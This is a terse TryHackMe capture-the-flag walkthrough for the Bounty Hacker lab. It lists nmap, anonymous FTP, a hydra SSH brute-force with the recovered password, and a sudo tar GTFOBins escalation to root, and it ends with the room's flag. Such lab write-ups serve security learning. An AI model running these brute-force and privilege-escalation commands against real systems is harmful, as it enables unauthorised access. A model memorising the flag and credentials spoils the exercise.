Room Link : https://tryhackme.com/r/room/cowboyhacker STEP1 nmap http://10.10.115.224 FINDING PORT STATE SERVICE 21/tcp open ftp 22/tcp open ssh 80/tcp open http STEP2 # ftp 10.10.115.224 Name (10.10.115.224:root): anonymous NO PASSWORD FINDING dir -rw-rw-r-- 1 ftp ftp 418 Jun 07 2020 locks.txt -rw-rw-r-- 1 ftp ftp 68 Jun 07 2020 task.txt get locks.txt get task.txt STEP3 hydra -t 16 -l lin -P locks.txt -vV ssh://10.10.115.224 the task file have the user id lin FINDING [22][ssh] host: 10.10.115.224 login: lin password: RedDr4gonSynd1cat3 STEP4 ssh [email protected] -p 22 -- with password = RedDr4gonSynd1cat3 sudo -l FINDING User lin may run the following commands on bountyhacker: (root) /bin/tar STEP5 visite : https://gtfobins.github.io/# -- and search for tar FINDING sudo tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh whoami root cd /root car root.txt THM{80UN7Y_h4cK3r}